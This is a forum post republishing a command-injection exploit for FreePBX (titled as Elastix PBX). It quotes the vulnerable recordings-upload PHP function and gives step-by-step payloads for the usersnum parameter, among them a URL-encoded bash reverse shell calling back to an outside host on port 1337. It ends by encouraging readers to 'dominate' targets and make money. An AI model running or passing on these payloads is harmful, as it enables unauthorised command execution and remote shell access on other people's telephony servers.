HackerTop - View topic - Elastix PBX 2.x.x Remote Command Execution 0day Exploit
View unanswered posts | View active topics It is currently Wed Dec 19, 2018 10:03 am



Reply to topic  [ 1 post ] 
 Elastix PBX 2.x.x Remote Command Execution 0day Exploit 
Author Message
Site Admin
User avatar

Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
Reply with quote
App : Freepbx 2.x
Download : schmoozecom.net
Auther : i-Hmx
Mail : n0p1337@gmail.com
Home : security arrays inc. , sec4ever.com , exploit4arab.net

And again , while the distro is widely user , Schmoozecom staff not giving
it enough attention ,
all they provided for the distro is adding the schmoozecom fancy logo and
"Developed by schmoozecom" Teraraa :/
What ever,
Freepbx suffer from another command execution vuln , not so critical but
perhaps many people gonna be interested abt it
as it can be used to dump plaintext data from the PBX Box ;)

Vulnerable function "recording_addpage" @
admin/modules/recordings/page.recordings.php
Code:
function recording_addpage($usersnum) {
    global $fc_save;
    global $fc_check;
    global $recordings_save_path;

    ?>
    <div class="content">
    <h2><?php echo _("System Recordings")?></h2>
    <h3><?php echo _("Add Recording") ?></h3>
    <h5><?php echo _("Step 1: Record or upload")?></h5>
    <?php if (!empty($usersnum)) {
    echo '<p>';
        echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
dial")."&nbsp;".$fc_save." <span>";
        echo _("Start speaking at the tone. Press # when
finished.")."</span></a>";
        echo _("and speak the message you wish to record. Press # when
finished.")."\n";
    echo '</p>';
    } else { ?>
        <form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post">
        <input type="hidden" name="display" value="recordings">
        <?php
        echo _("If you wish to make and verify recordings from your phone,
please enter your extension number here:"); ?>
        <input type="text" size="6" name="usersnum" tabindex="<?php echo
++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
_("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
        </form>
    <?php } ?>
  <p></p>
    <form enctype="multipart/form-data" name="upload" action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="POST">
        <?php echo _("Alternatively, upload a recording in any supported
asterisk format. Note that if you're using .wav, (eg, recorded with
Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
8000Hz")?>:<br>
        <input type="hidden" name="display" value="recordings">
        <input type="hidden" name="action" value="recordings_start">
                <input type="hidden" name="usersnum" value="<?php echo
$usersnum ?>">
        <input type="file" name="ivrfile" tabindex="<?php echo
++$tabindex;?>"/>
        <input type="button" value="<?php echo _("Upload")?>"
onclick="document.upload.submit(upload);alert('<?php echo
addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
echo ++$tabindex;?>"/>
    </form>
    <?php
    if (isset($_FILES['ivrfile']['tmp_name']) &&
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
    if (empty($usersnum) || !ctype_digit($usersnum)) {
            $dest = "unnumbered-";
        } else {
            $dest = "{$usersnum}-";
        }
        $suffix =
preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
"."), 1));
        $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
        move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
        system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
$destfilename);
        system("chmod g+rw ".$destfilename);
        echo "<h6>"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."</h6>";
        $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
    } ?>
    <form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post" onsubmit="return rec_onsubmit();">
    <input type="hidden" name="action" value="recorded">
    <input type="hidden" name="display" value="recordings">
    <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
    <?php
    if (!empty($usersnum)) { ?>
        <h5><?php echo _("Step 2: Verify")?></h5>
        <p> <?php echo _("After recording or
uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to
listen to your recording.")?> </p>
        <p> <?php echo _("If you wish to re-record your message,
dial")."&nbsp;".$fc_save; ?></p>
        <h5><?php echo _("Step 3: Name")?> </h5> <?php
    } else {
        echo "<h5>"._("Step 2: Name")."</h5>";
    } ?>
    <table style="text-align:right;">
        <tr valign="top">
            <td valign="top"><?php echo _("Name this Recording")?>: </td>
            <td style="text-align:left"><input type="text" name="rname"
value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
        </tr>
    </table>

    <h6><?php
    echo _("Click \"SAVE\" when you are satisfied with your recording");
    echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
    <input name="Submit" type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
    <?php recordings_form_jscript(); ?>
    </form>
    </div>
<?php
}

Actually as you can see there are many exploitable lines there , but here
am interested about this line
Code:
system("chmod g+rw ".$destfilename);

if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Code:
Target/admin/config.php?type=setup&display=recordings

before uploading open firebug
search for usersnum
edit value to
Code:
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris

and you are ready to dominate , or even make some $$ if you r interested ;)
Have a good day


Sun Jul 24, 2016 11:49 am
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB